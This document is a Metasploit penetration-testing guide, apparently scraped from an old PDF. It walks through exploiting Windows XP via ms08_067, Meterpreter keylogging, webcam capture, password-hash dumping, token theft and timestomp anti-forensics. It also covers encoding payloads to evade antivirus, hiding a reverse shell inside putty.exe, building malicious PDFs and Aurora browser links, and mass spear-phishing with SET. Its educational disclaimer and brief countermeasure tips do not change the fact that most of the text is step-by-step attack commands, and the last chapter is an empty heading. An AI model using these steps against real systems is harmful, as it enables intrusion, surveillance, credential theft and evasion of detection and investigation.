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Met As Ploit Guide

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Metasploit Guide

Table of Contents 1.Introduction about Metasploit 2.Metasploit Basics 3.Information Gathering 4.Exploitation 5.Introduction about Meterpreter 6.Post Exploitaton using Meterpreter 7.Metasploit Utilities 8.Meterpreter Scripting 9.Client Side Exploitation 10.Social Engineering Toolkit(SET) 11.Auxiliary module 12.Linux exploitation

Attribution 1. 2. 3. 4. 5.Various blogs and ethical hacking websites

Note:This document was solely made for educational purposes .Please do not use these methods for any kind of malicious activities or purposes (Intentional or Unintentional).

Chapter One

Introduction about Metasploit

Metasploit is an open source computer security project.Metasploit is not a single tool,it is a framework which is used for developing and executing exploit code against the Remote target.Using Metasploit we can exploit most of the vulnerabilities that exist in a software.

History of Metasploit
Metasploit was developed by a security researcher HD Moore in october 2003.He used perl scripting language to develop Metasploit.Metaspolit gained high popularity in information security field in a short time and this project was rewritten in Ruby programming language with more than 1,50,000 lines of code and version 3.0 was released in 2007.In 2009 Metasploit was acquired by a Security firm called Rapid7. Now it has more than 1000 exploits, 260 payloads,460 auxiliary modules which have been effctively been used for exploiting and doing penetration testing on the target system.

For performing any pentesting we should set up our own lab. 1.VM Ware or Virtual Box. 2.Back Track R3 (Linux based operating system which is used for pentesting). 3.Metasploitable (Intentionally vulnerable operating system developed by the Metasploit developers). 4.Windows XP 5.Windows 7

Metaspolit Architecture

1.Rex : It is the basic library for performing most tasks.It handles sockets and differnet types of protocols. 2.MSF Core :It Provides the basic API.Defines the metasploit framework. 3.MSF Base: It provides the friendly API. Provides simplified API's for use in the framework

Payload: Payload is a piece of code that runs in the target system remotely. Exploit : Exploit is a piece of software,chunk of data or a sequence of code that takes the advantage of a bug of vulnerability. Auxiliary modules : This module is used for scanning ,fuzzing and doing various tasks. Encoder:A program which encodes our payloads to avoid anti virus detection.


Metasploit has different interfaces to ease our tasks.We can do a variety of tasks with these interfaces. 1.MSFConsole :This is the main interface we use throughout this terminal type msfconsole. You can get a window like the below screenshot.

Msfconsole eases all our tasks compared to other interfaces.I will explain all the commands which we can use in msfconsole interface in the metasploit basics chapter.


This is the sample usage of msfcli interface.msfcli gives more importance to scripting and interpretability.It directly runs command line.It is a fantastic tool when you know the exact exploit and payload.


open 1.Terminalmsfcli -h 2.msfcli windows/smb/ms08_067_netapi O it displays various options 3.msfcli windows/smb/ms08_067_netapi RHOST= P RHOST is the remote host,we should type the victim's ip address P- Payloads 4.msfcli windows/smb/ms08_067_netapi RHOST= PAYLOAD=windows/shell/bind_tcp E This will exploit the windows xp pc and we get a shell.

Armitage is the graphical GUI version for metasploit.It was developed by Raphel Mudge.In armitage we can open more than one terminal and search our exploits either GUI or CUI at the same time.

open terminaltype Armitage it will display the above window.we can search our exploits using the attacks tab and search for the appropriate payloads for that exploit The armitage windos below displays metasploit CUI version and above GUI version you can view video tutorials about armitage in the link below.


It is better to use the msfconsole rather than other interfaces because it give more power to our pentesting tasks.

Metasploit Editions:

Metasploit provides a community editon free of cost to everyone,the remaining two editions cost more.Giant security consulting firms are using express and pro editions because those edtions are too costly.

Chapter Two

Metasploit Basics
To become familiar with the metasploit framework one should know the basic commands of metasploit.Metasploit commands are classified into 2 types 1.Core commands 2.Database commands To open metasploit,open terminal type msfconsole.

1.Core commands

To open these commands type ? Or type help in the metasploit console.Now i will explain the important commands that will help in the exploitation.

Useful commands 1)back : To come back from the current exploit or module

you can see i am getting back from the exploit(ms10_002_aurora) to msf main window.

2)banner: This command displays metasploit banner

3)connect :This command is used to connect to the host.we should specify the host ip
address and port number along with this command.

4)exit and quit: These commands are used to exit from metasploit and it comes to the

5)irb:This command is used to drop a irb mode.Using this mode one can write one's own
ruby scripts.

6)info:This command displays the whole information about the selected exploit.

7)load:This command is used to load plugins into metasploit.

8)unload:This command is used to unload the loaded plugin from the framework.

9)search:This command is used to search a specific exploit or module.This command is

very useful to search any module.

10)resource: This command is used to run specific commnads from a specified file.we
should give the file path along wiht this command.

11)use:This command is used to select a specific exploit.

12)version:This command will display the current version of metasploit.

To update metasploit type msfupdate in the console.

13)set and unset: These commands set variables.By using these commands we can set
our payloads and we can set ip address.

using unset we can unset the value and we can give the new ipaddress.

14)setg and unsetg:These commands are used to set our variable globally throught our

15)show :This command is used to view the options or modules.It is a very useful

Database commands : Database commands are very useful to maintain huge data and
export that data into files.We can share data among our pentesting team and we can collaborate that data. By default,metasploit comes with postgress database

How to connect to the database ?

We should use the db_connect command to connect to the database.To connect to the database we should know the password,username,port,hostname and database name all these details you can find in the database.yml can access this file through cd /opt/metasploit/config/ :~ cat database.yml

1)db_connect:This command is used to connect to the database.The format to use this

command is " db_connect username:password@hostname:portname/database " name.In my system my username password are db_connect msf3:4bfedfc2@localhost:7337/msf3dev

2)db_disconnect: To disconnect from the database.Here you can see the status as no

3)db_status:To see the current status of the database.

4)creds:This command is used to view the credential stored in the system.This command
shows the hashed passwords.

5)db_import:To import the files from various softwares like nessus and nexpose. 6)db_export:To export our results to other softwares. 7)hosts:This command will display the connected hosts .

you can use hosts -c to filter the columns.

8)db_nmap: Nmap is a very useful tool for pentester and network engineers.We can do
many tasks using nmap tool . eg:db_nmap -O displays the services and operating system info.

9)services:This command wil disply the list of all services running.

10)Vulns:It will display the vulnerabilities existing in the victim system.

Chapter Three

Informaiton gathering
"If I had eight hours to chop down a tree, I'd spend six hours sharpening my axe". - Abraham Lincoln Information gathering is the first step in penetration testing.In this phase we can gather as much information as possible about the target.The more information we have,the more is the chance of exploting.In this phase we can gather information like ipaddress,services if the target is a website then we should gather sub domains,emails,hosting server and location of the server inforamtion. There are 2 types of information gathering 1)Active information gathering 2)Passive information gathering

Passive information gathering: In this technique we are not directly interacting with
the target.we will search information using whois and nslookup commands.There are many tools available in Back Track to find the dns information.

Nslookup:Using nslookup we will get the additional server informaiton.

Whois :This command is used to gather the subdomains informaiton and registrar name.

These are only few techniques discussed.There are many more to gather information in a passive way.

Active information gathering:

In active informaiton gathering we will use a tool nmap(network mapper) , written by Gordon fyodor lyon.It is a cross platform tool. I will explain some basic nmap commands to scan our network.The book "Nmap cookbook the fat free guide for network scanning" is highly recommended to explore much about Nmap.

To scan a single ip address:we can use Nmap to scan a single ip address.

usage: nmap "ip address"

To scan multiple ip address

usage: nmap

To scan entire subnet: usage: nmap

Advanced scanning options:

Nmap has many advanced features to successfully gather more information about the target.We can scan tcp ports,udp ports and find the operating system and version detection. We can perform null scan,ACK scan and trace route on the target.Nmap is like a swiss army knife.we can handle a wide variety of security testing and network administrative tasks.

Tcp SYN scan:

We can perform SYNscan on the network.This scan is very stealthy.It does not open a full connection to the remote host.

usage: nmap -sS

UDP(User Datagram Protocol) scan:

We can scan UDP ports of the target system. usage :nmap -sU

Tcp Null scan:

Now we are performing null scan to trick the firewalled system and to get the response from that system.

Usage: nmap -sN

Operating system and version detection

To find the operating system of the target we will use -O option.

Usage: nmap -O

To find the version detection:

Using Nmap we can find versions of the services running on the ports. We wil use -sV option to do this.

Usage :nmap -sV 1921.168.217.131

You can combine bothe -O and -SV options at a time usage: nmap -O -sV These are some nmap commands to find the target services and open ports and operating system info.There are many other advanced options that exist in nmap.I highly recommend a book "nmap cookbook" to know more about nmap and explore many options that exist nmap.

Chapter Four

Exploitation is the meridian for every security engineer.It is a great feeling to exploit a first machine and get full control over that machine.Exploitation is a very difficult task to accomplish.we need to know much about the target.In this chapter i will show you advanced techniques to get shell on the target system and you will gain full control over the victim system. Before reading this chapter please read chapter two to know the basics of metasploit.I am going to use the msfconsole throught out this chapter. Basic exploitation: I am going to use ms08_067_netapi can get much information about this exploit in the below link.

Metasploit has a great feature tab completion.If we dont know about particular exploit press tab twice it to get some suggestions displayed.

You can see it displays various exploits.Or you can search for particular exploit using search command.

Search netapi: Usage: search "exploit name"

show: show command is used to view various exploits,payloads,encoders . Usage: show exploits,show payloads, show encoders. Steps to exploit our first windows machine. Step 1: use exploit/windows/smb/ms08_067_netapi. Step 2: show options to view various options.

RHOST(Remote Host):It is the remote host,we should type the remote ip address of the
target system.

LHOST(Local Host):It is the local host , that means our system ip address.

Step 3: set RHOST Set and setg : Using these commands we can set the variable to a particular field.
Setg command is used to set a varialble we can use that variable throught out penetration test.

Step 4: set a payload for our exploit.

Usage:show payloads

You can see a huge payload list.Now we will use a payload bind shell.It directly binds with the target port 445 .

Setting a Payload: Usage: set Payload windows/shell/bind_tcp

Step 5 :To get the shell on the target computer, use the command "exploit".This command runs
the payload against the target system.Then you will get a remote shell on the target system.

Usage: exploit.

For confirmation, you can check the ip address of the remote system just by typing "ipconfig"

Congratulations! you have exploited the your first windows machine.Now you can create your own folders and and run the files remotely on the target system.To give more power to exploitation we willl user meterpreter payload.I will disscuss this payload in later.

Commands used in this chapter

1)use exploit/windows/smb/ms08_067_netapi ---> To select a particular exploit 2)show options -------------> To view the options 3) set RHOST --------------> Victim ip address which we have to set 4) windows/shell/bind_tcp-------------> To set the particular payload 5) exploit---------------->To run the payload

Chapter Five
Introduction about Meterpreter
Meterpreter is the forerunner product in Metasploit framework which is leveraged as a payload after exploitation.Meterpreter is used to enhance the post exploitation.


It does not create a new process and completely resides in the memory.So there is no chance of detection.It does not write any data on the disk.All the communication from the attacker to the victim is completely encrpyted.It creates a separate channel to encrypt the data. Meterpreter has huge options to ease our post exploitation.We can gain full control over the victim system.

Exploitation using meterpreter :

In this we follow the same procedure as the above exploitation,except the payload.Here we will use meterpreter as the payload to get the meterpreter shell.

Step 1: Choose a exploit. Usage: use exploit/windows/smb/ms08_067_netapi

Step 2:

RHOST :This is the victim ip address.

Step 3 : Setting the meterpreter as paylaod. Usage: Set payload windows/meterpreter/bind_tcp Step 4: run "exploit" command.

Here you got Shell as can do a variety of tasks using this shell.I will explain those in the later chapters. Here is the list of commands.

These are only few commands .There are many more.In the later chapter you will come across all those commands.

Chapter Six

Post Exploitation using Meterpreter

We can significantly improve the post exploitation using meterpreter.Many of us think, getting shell on the target system is an important task,but to control our target system is very important.We can control our target extensively by using meterpreter.Meterpreter is the extension to metasploit framework that allows us to levarage metasploit's functionality and further compromise our target. We can do many amazing tasks using meterpreter payload like webcam snap shot,dumping hashes,monitoring keystrokes,downloading files from the target and uploading files into the target and many more.You can see all those tasks in this chapter. First,we have to compromise our target using meterpreter then we will get a meterpreter shell.Follow the procedure in the above chapter"Introduction to Meterpreter" to exploit the target.Meterpreter has a very huge command list, i will try to cover 95% of commands in this chapter.Practice all the commands which i disscuss in this chapter to become comfortable with Meterpreter. Meterpreter commands are divided into many sections depending upon their usage.I will discuss all the commands not in the same order, but in a random order , depending upon the task. 1.Core commands 2.Stdapi :System commands 3.Stdapi :File sytem commands 4.Stdapi :User interface commands 5.Stdapi :Networking commands 6.priv commands Some of these commands are self explanatory, you can easily understand those commands by reading the description.I will leave those commands as an exercise to you.I will highly recommend you to read the book "Introduction to the command line(Second Edition):The fat free guide to Unix and Linux Commands" to become familiar in linux Operating system.This book gives you a good knowledge on linux commands and how to use them efficiently.

1) Core commands:

2) System Commands:

3) File system commands:

4) User interface and webcam commands

5)Networking commands:

6)Priv commands

1)Core commands:Core commands are basic meterpreter commands. 1)Background:This commands are used to background a meterpreter session and we
will come back to the exploit module. To view the available sessions "sessions -l" To interact with the seesion we have to use "sessions -i 'session id' eg: sessions -i 1

2)bgrun:This command is used to execute a meterpreter script as the background


3)info:It gives the descriptiona about selected post exploitation module

Usage: inof module name.

4)migrate:It migrates to another process.We have to migrate to another process because

the victim might close the process which meterpreter binds.So we have to migrate to system processess. Usage: migrate "process id" eg:migrate 12212

5)use : This command is used to load a particular extension into the framework.It is like
the load command in metasploit. Usage: use espia

6) run: This command is used to run a meterpreter script. Usage:run script name eg: run checkvm

7)irb:This command is used to drop into a ruby shell where we can create ruby based

8)Channel commands:Channels are very useful to execute our commands on the target
system.The communication in the channels are encrypted.we can read,write and interact with the channels. To create a channel we have to use execute command. Usage :execute -f explorer.exe -c

channel -l: To view the list of channels.

Channel -w :To write data into a particular channel we will use this commnad.
Usage: channel -w 2(1 is the channel number)

channel -r :To reda data from a particular channel.

Usage: channel -r 2

Interact: This command is used to interact with a particular channel

Usage: interact 2

File system commands: 1)pwd:It displays the print working direcory and 'cd' command is used to change the

2)ls: To list the files in a directory.

3)cat:This command is used to read the contents in a file.In 'ls' you can find two files
namely credit card and email password.I intentionally created them, to demonstrate how awful it is to save confidentendial inforamation without encrypting.

So do not save your confidential information into text files and do not write passwords any where.If you want to write,then encrypt those files.True encrypt is a good software to encrypt any kind of files.

4)download:You can also download those files using this command.

Usage : downlaod file path eg: download c:\\creditcard.txt

5)upload:You can upload your backdoors into the target system.

Usage: upload source destination eg: upload /root/payload.exe c:\\

Search:This command is used to search files in a folder or drive.We can also specify the
type of file to search eg. Doc,txt,pdf

Usage: search -d c:\\ -f *.txt -r

mkdir,rmdir: To make a directory we use 'mkdir' command.To remove a directory we

use 'rmdir' command.

Usage : mkdir kaleem Usage: rmdir kaleem

Networking commands: 1)arp: To display the host arp cache and host information.

2)ipconfig:It used to display the remote host ipaddress.

Netstat:It is used to display the network statistics.

Route:It is used to display the routing table information.This command is very useful in
pivoting concept.

Usage :route -h

System commands: sysinfo:This command is used to view the target system information.

Ps:This command is used to display the process running in the target system.

getpid:This command is used to view the current process .

getuid:This command is used to view the current user.

Reboot:This command is used to reboot the our target system. Shutdown:This command is used to shutdown the remote system. Shell:This command is used to drop a shell in the remote system.

Token impersonation:
Token impersonation is a very important concept in meterpreter.Windows token are just like web "cookies". They are like temporary keys which just hold an object security inforamtion for the entire login that they do not have to provide their credentials each time when accessing a file or an object.There are two types of tokens available 1)Delegation token 2)impersonate token

1)Delegation token:Delegation tokens are used for interactive login such as logging into
our windows machine and connceting to remote desktop.

2)Impersonate token:Impersonate tokens are used for non-interactvie logins like

connecting to a network drive. Tokens can be availabe to us untill reboot.When the user logsoff from the system, delegation token became impesonate token but it has the all the rights just like delegation token. We will use 'incognito' extension to steal and impersonate windows token.You can find much about token in below pdf link. First we have to load incognito extension into our meterpreter.

Usage: use incognito

To view availabe tokens you can use below command.

Usage:list_tokens -u

You can see 4 delegation tokens and 1 impersonate token are availabe .Quickly check who we are using 'getuid' command.

Usage: getuid

Now I am logged as a NT AUTHORITY\SYSTEM.Now i am going to impersonate as other user.

You can see in delegation tokens KALEEM-27A12BDC\ADMINISTRATOR token availabe.Now i am going to impersonate like that user.

Usage: impersonate token name

eg: impersonate KALEEM-27A12BDC\\ADMINISTRATOR You can see i impersonated as can see user user id using 'getuid' command.

Steal token:

You can steal token from other users. Usage: steal process id eg: steal 1234

drop token:

You can drop token to get back.You can see in the below picute,first I impersonate as kaleem and I used drop token command to get back to NT AUTHORITY.

Usage: drop_token


This command is also used to get back to the old user. Usage:rev2self

getprivs: This command is used to get all the available privileges on the victim machine.

User interface and web cam commands: idletime: This is used to view how long our victim is away from the system,meaning he
doesnot interact with keyboard or mouse.

All of us very are curious about what the victim is typing in his system and how to recored all those keystrokes.Metasploit developers have done a great job to write an inbuilt keylogger.We can monitor all the keystrokes typed by our victim. Ther are 3 commands available in meterpreter.

keyscan_start: To start a keylogger on the victim machine. keyscan_dump: To dump all the keystrokes typed by our victim. keyscan_stop:To stop the keylogger on the victim's system.
I performed all these commands on my victim machine(windows xp).You can view them in the below picture.

Even it can record alt,ctrl,shift all keys.It is a very powerful command.

Uictl:This command is used to control the victim's keyboard and mouse.We can disable
their keyboard or mouse remotely.

Usage :uictl enable\disable keyboard\mouse.

We can grab screen shots of our victim's machine.We can view what the victim is viewing.You can see my windows machine desktop here.

Usage: screeenshot

Webcam commands:
Another interesting commands are webcam commands.You can view the victim remotely.I do not have a webcam in my laptop(i am using a pretty old one).You can try this command in your system. There are two commands are available.

1)webcam_list: To view list the list of webcams. Usage:webcam_list 2)webcam_snap:To take the snap shot of our victim. Usage:webcam_snap

I have got an error because I do not have a webcam on my laptop.It will work if you have one on yours.

Priv commands:

These commands are used to escalate privileges and to get all the available previleges on the victim machine. Getsystem: This command is used to get privileges on the victim system.

Usage: getsystem

hashdump:This command is used to dump all the hashed passwords from the victim

You can use crack the hashed passwords using psexec exploit or jtr_crack_fast.

timestomp(anti forensic tool):

When we are conducting a pentest on the victim's system,we may access their filesystem.If any forensic investigation,they will easily detect that the system has been compromised.The best way to avoid forensic detection is not to access our victim's file system.So we will use meterpreterIt completely resides in the memory and does not write any data on the disk.However, in most of the cases we will interact with the file system. Then we have to use 'timestomp' ,a great tool to avoid forensic detection.By using this tool we can escape from forensic investigation.By using this tool,one can change the MAC(modified,access,creation)attributes of a file. You can view various options by typing 'timestomp -h' command.

Usage: timestomp -h

Set the creation time of a file :

We can set our own creation time to a file.To do this use '-c' option.

Usage: timestomp path of the file -c "MM/DD/YYYY HH:MM:SS" Eg: timestomp c:\\creditcard.txt -c "08/20/1970 12:12:12"

Set the modificaiton time of a file:

We can set the modification time of a file.To do this use '-m' option.

Usage:timestomp path of the file -m "MM/DD/YYYY HH:MM:SS" Eg: timestomp c:\\creditcard.txt -m "09/12/2015 12:13:24"

Set the accessed time of a file:

We can set the accessed time of a file.To do this use '-a' option. Usage :timestomp path of the file "MM/DD/YYYY HH:MM:SS" Eg:timestomp c:\\creditcard.txt "09/18/1999 12:46:45"

To display MAC attributes:

Use '-v' option to display all attributes.

Usage:timestomp path of the file -v Eg: timestomp c:\\creditcard.txt -v

To set existing file attributes:

We can set already existing file attributes to a our specified file. To do this use '-f' option.In the below example i specified 'ntldr' file attributes to my file.

Usage: timestomp path of our file -f path of existing file Eg: timestomp c:\\creditcard.txt -f c:\\ntldr

Chapter Seven

Metasploit Utilities
Metasploit comes with two utilities to genearate shellcode and to evade antivirus detection.Using these utilities we can stealthily do the exploitation. There are two types of utilities 1.Msfpayload 2.Msfencode

Using msfpayload we can generate shellcode executables,and we can use that shellcode outside the framework.We can generate payload according to our format.we can create C,Ruby,Javascript and exe many types of formats.

Step 1: Usage : msfpayload -h

step 2:

To view various options to fill.

Usage: msfpayload windows/meterpreter/reverse_tcp O step 3

msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=445 X> payload.exe

Here i filled the options LHOST AND LPORT and created .exe type payload. Next i am going to use multihandler exploit to attack.

Step 4: multi handler exploit

1.use exploit/multi/handler 2.set payload windows/meterpreter/reverse_tcp 3.set LHOST 4.set LPORT 1234 5.exploit send the created payload to the victim using some social engineering techniques and when he opens that payload you will get the meterpreter shell.

The payload which we have generated using msfpayload is fully functional and if victim scans with the help of an antivirus,it could be detected.Antivirus softwares look for signature to scan,so the shell code is detected by the antivirus. To evade this , metasploit developers have done a great job to introduce a new utility called msfencode.Using this we can encode our shell code with various encoders to bypass antivirus detection.

Usage :msfencode -h

There are different kind of options available to use. Important options -c -------------- means count how many no. of times we are encoding eg : -c 5 -------means i am encoding 5 times. -e---------------Name of the encode we use eg: -e x86/alpha_upper -o-------------- Give out file name eg: -o payload.exe -t---------------Type of format eg: -t raw -x-------------- Option to give alternative templete. Eg: -x notepad.exe -k-----------The given temple opens and our payload runs in new process. Eg: -x notepad.exe -k The victim is shown the notepad when he opens the file but that payload runs stealthily on the background.

List of msfencoders : Usuage: msfencode -l

These are a list of available encoders .We can encode our payload using any of the above encoders to evade antivirus detection. The very good encoder is shikata_ga_nai it is a polymorphic encoder.

Step 3 : Encoding wiht msfencode Usage: msfpayload windows/meterpreter/reverse_tcp LHOST=

LPORT=4444 R | msfencode -e x86/shikata_ga_nai -t exe > payload.exe

explanation about above command

msfpayload------------------------------Command to generate payload windows/meterpreter/reverse_tcp--- meterpreter payload LHOST------------------------------------My backtrack system ip address LPORT-------------------------------------Port number to bind R | -------------------------------------------'R'means raw type of input,I used wiht pipe symbol.This pipe symbol appends the msfpayload output msfencode. Msfencode----------------------------------- Command to encode our payload -e----------------------------------------------- "-e" is used to before the name of the encoder. shikata_ga_nai------------------------------ Name of the encoder. -t exe------------------------------------------ "-t" is used to tell what type of extension we are using.Here i am using .exe extension. > payload.exe------------------------------- output file name is payload.

Multi encoding with msfencode Step 4: Usage: msfpayload windows/meterpreter/reverse_tcp LHOST=

LPORT=444 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 8 -t raw | msfencode -e x86/shikata_ga_nai -c 9 -t exe >payload.exe


In the above command I have used 3 encoders.I have differntiated 3 of them in different colours. Red colour: msfencode -e x86/shikata_ga_nai -c 5 -t raw I encoded shikata_ga_nai encoder 5 times and type of output is raw. Green colour: msfencode -e x86/countdown -c 8 -t raw I encoded countdown encoder 8 times and type of outpur is raw Pink colour: msfencode -e x86/shikata_ga_nai -c 9 -t exe I encoded shikata_ga_nai encoder 9 times and type of output is exe I did all these encoding to evade antivirus detection.This is called multi encoding because i used many encoders to encode my payload.

Encoding with Custom executabel templats Step 5:

msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -x putty.exe -o payload.exe -k

I encoded my payload with shikata_ga_nai encoder 5 times and type of output is .exe. -x putty.exe --------- This is custom executable templete -o payload.exe-------Output file and the name of file is payload -k-----------------------It create a new process and run stealthy in the background

Chapter Eight

Meterpreter scripting
Meterpreter has many inbuilt scripts to complete our difficult task with using just a sample script.We can create our own scirpts using ruby language and run those scripts after exploitation.

You can see sample scripts in the above picture.There are more than 200 scripts available in metasploit to do our post exploitation.Now i will discuss some important scripts. 1.checkvm 2.credcollect 3.keylogrecorder 4.vnc 6.getcountermeasure 7.killav 8.scraper 9.enum_firefox 10.file_collector 11.arp_scanner 12.gettelnet 13.hostedit

To execute a particular script you should use the "run" command along with that script name.

Usage: run checkvm 1)checkvm :This script is used to check target is runnig or virtual machine or not.

2)credcollect:This script is used to collect the hacked passwords. Usuage :run credcollect

3)keylogrecorder: This script will record all keystorkes which has typed on the victim

4)vnc:This script is very useful script.It gives remote desktop connect on the remote can see my windows system here. Usage : run vnc

5)webcam:This script automatically switches on the webcam on the remote machine

and we can view them remotely. Usage: run webcam 6)getcountermeasure:This script is a wonderful script.It can bypass the antiviruses,firewall,and intrusion detction system on the victim machine.

7)killav:This script kills the antivirus on the victim system. Usage :run killav

8)Scraper:This script is very handy.It will download all the system informtion and all the
registry information.

Usage : run scraper

9)enum_firefox:This script will gather the stored passwods and cookies in the firefox
browser on the victim's system.

Usage: run enum_firefox 10)file_collector:This script is used to gather existing files on the target system.We can
gather doc,pdf and text files using this script.

I used many optins to search files, you can see various options using -h option -d --------- To search a particular direcotory -f -----------To search a particular file type.Here i am searching text files. -r-----------To search recursively

Usage: run file_collector -d c:\\ -f *.txt -r

11)gettelnet:This script enables the telnet session on the remote pc. Usage :run gettelnet

12)arp_scanner:This script is used for pivoting and portforward and we can enumerate
local interfaces using this script. Usage : run arp_scanner

13)hostsedit:This script is used to edit host file into the remote system.

Chapter Nine

Client Side Exploitation

Client side attacks were the next evolvement of attacks after network defense became much robust.These attacks target the software which is installed on the victim computer like browsers,pdf readers and MSword readers.These softwares are commonly installed on every computer either it is an office computer or our personal computer. These attacks have been bestselling because of lack of awareness in the people.In client side attacks,the attacker can send exploits using social engineering techniques.The systems which open that file or malicious link sent by the attacker will be compromised.


1.Update your antivirus and antispyware software. 2.Update your operating system and web browsers on a regular basis. 3.Update your pdf reader (eg abode,foxit),flash players(quicktime,flash),word document readers(MSword). 4.Do not visit atrocious websites. 5.Download softwares from genuine websites because some websites offer spyware software. 6.Mozilla and chrome users can use security addons like WOT(Web Of Trust),NoScript and Better Privacy.

Browser based exploits:In this module our main target is browser.Now i will
demonstrate an infamous exploit Aurora.

Internet explorer Aurora memory corruption:

In the year 2010 this exploit came into picture.Hacker used this exploit to attack many multinational companies.This module exploits memory corruption flaw in the internet explorer 6 version.

Demo Time Step1: use exploit/windows/browser/ms10_002_aurora

Type "show options"to view different options.we have to set SRVHOST,SRVPORT and URIPATH.

Step 2:

1)I am setting SRVHOST as my local address.This is my system's ip address. 2)I am setting SRVPORT as 80 3)I am setting URIPATH as / 4)I am setting meterpreter reverse_tcp as payload. 5)To view different options type show options

Step 3

1)I am setting LHOST to my ip address 2)To run the payload on the remote system type "exploit" Step4: 1.Malicious URL has created.Now we have to send that url to can see i have opened that url inmy windows xp(victim)system.

2.When i open that link Aurora exploit start working.

3.You can see my windows system has been compromised. 4.You are greeted with meterpreter shell. This exploit has been working flawlessly on internet explorer 6 version. So it is better to update your browser.

File format exploits

File format exploits are new generation exploits.In this method we will send a file of type pdf,doc or xlb file to the target.when the target opens that file their system gets compromised.

Demo Time : Adobe util.printf() Bufferoverflow vulnerability:

There is buffer overflow vulnerabillity in adobe reader and adobe acrobat reader version 8.1.By creating a specially crafted pdf we can exploit the target system.You can read more about this vulnerability in the below link. Step 1: use exploit/windows/fileformat/adobe_utilprintf

I am using adobe utilprintf exploit.Type "show options" to view different types of options. Step 2:Change the file name Usage: set FILENAME book.pdf

Step 3: Set a meterpreter payload,and fill LHOST and type "exploit"command to

generate a malicious pdf .

Usage : set payload windows/meterpreter/reverse_tcp

Malicious pdf has been created and it is saved in /root/.msf4/local/book.pdf directory. Copy that pdf to your desktop.Use "cp" command to copy the malicious pdf & send that pdf using some social engineering techniques.

Step 4: Setting up a listener Usage : use exploit/multi/handler and set meterpreter as payload.You should use the
same payload as above.

Step 5: Usage : set LHOST system ip address)

Type "exploit" to start the payload handler.when ever the victim clicks the malicious pdf you will be greeted with a meterpreter shell.

Step 6 :

You can get meterpreter shell on your windows xp machine.We also have exploits in Microsoft word and excel with latest version 2007 and 2010.

1.Update your pdf readers and word readers. 2.Do not open malicious attachements from unknown persons.

Chapter Ten

Social Engineering Tookit(SET)

Social engineering is the art of mainpulating people into performing actions or divulging confidential information like passwords. SET was developed by David Kenndy using python language with the help of security community.The main aim of SET is to fill a gap in the penetration testing community and bring awarness about the social engineering attacks.Any firewall or network intrusion detection system cannot stop social engineering attacks because in social engineering ,the weakest link in the security chain is human stupidity. The attacks built in this toolkit were designed to attack a person or an organization.This tool kit has different modules In this tutorial I will perform spearphising attack.

Spearphising Module:

This module allows you craft email messages and send them to a large number of people or a single email address.In this attack we will perform fileformat exploits.We will send an email to a person with an attachement like adobe reader or zip file format.when the victim clicks on the attachment their system will compromise.We will get a shell on that system.

How to open social engineering toolkit ? :

Steps: cd pentest/exploits/set# ./set

Step 2: Choose spear-phising attack vector.You can see various other modules are also
available.You can try all those by yourself.It is very easy to use social engineering tookit.No need to remember commands to use this toolkit. The GUI is very user friendly.

Step 3: Choose "perform mass email attack option" , it will display various file format

Step 4 :We are selecting adobe reader buffer overflow vulnerability.You can see
diffenrent payloads have generated according to our exploit.

Step 5:The payload has generated.Now choose first option to keep the same file name or
else you can use your preferable name.

Step 7:Here i am choosing status report as my template and i am giving the victim's
email address. Next give your email address.You can give gmail,yahoo,hotmail email address.You have to set these options in SET config file and type the password for your email. You should install "sendmail" package in your backtrack.If not you can install using "apt-get install sendmail" command.You should change the option SEND_EMAIL=OFF to SEND_EMAIL=ON in SET config file.

When the victim opens your email and opens the evil attachement,their system gets have to set a listener to get a shell.

Step 8: How to set up a listener ? You have to use an exploit to listen. Steps
1) use exploit/multi/handler 2) set payload windows/meterpreter/reverse_tcp 3) set LHOST "Your system ip address" eg: set LHOST 4) set LPORT "Give a port number to listen eg :set LPORT 1234 5) exploit when the victim opens your attachment you will be greeted with a meterprete shell after which you can do many tasks.


Do not open malicious links from suspected or unknown people.Use addon WOT(Web of Trust).Update your antivirus on a daily basis. In SET you have many modules.One of them is "Website Attack Vector" module.In this module you can do "Metasploit Browser Exploitation","Java applet attack","Man in the middle attack" "Tabnapping attack" and many more .

Another eg: Metasploit Browser Exploitation:

In this attack the main victim is the Browser.In this we can choose a web templete for eg :gmail,facebook,yahoo the templete looks like same as genuine page.Then we can choose many browser based exploits. You can choose infamous exploit "Browser Auto pwn".Next set payload for listening.Then SET creates an ip address.Convert that ip address using bitly shortner website.And send that url to the victim.Whenever they open your crafted url their system gets compromised.Even, they donot know that their system has been compromised. Countermeasures: 1)Update you browser on a daily basis.Install security patches from your operating system Vendor. 2)It is better to use Firefox or chrome browser rather than using the internet explorer. 2)Install a personal firewall to monitor your web traffic.

Chapter Eleven

Auxiliary Modules
Auxiliary module are not exploits.When we hear about metasploit we always think about how to get a shell on a remote system.But in Pentesting we have to do many tasks like scanning the remote host,finding open ports ,server configuration and misconfiguration . In metasploit framework we have more than 560 auxiliary modules which include 1) Scanners 2) Fuzzers 3) HTTP 4) server 5) Dos and many more.I will show you how to work with auxiliary modules.You can acces auxiliary module using below navigation. Usage: cd /opt/metasploit/msf3/modules/auxiliary#

This is the main folder structure .All our auxiliary modules are arranged in good manner.We can use it accordingly.

Usage: Use auxiliary/ press tab twice you can see a list of auxiliary modules


Port scanners are used to see which ports are open on the target system.Now i am using a tcp port scanner to open ports on my windows xp system.

Usage:use auxiliary/scanners/portscan/tcp
Type "show options" to view available options

Set remote ip address -----set RHOSTS Change port numbers------set PORTS 1-1000

Now type "run" to run the portscanner

Scanning for netbios:

1.Set remote hosts-----set RHOSTS and type "run" to run the module.

Checking for smbversion:

Checking whether the smb service is running or not.

Setting rhost-----------set RHOSTS

Checking the connected hosts :


There are many scripts availabe to do make simple.You can try many other scripts according to your need.

Chapter Twelve
Linux exploitation
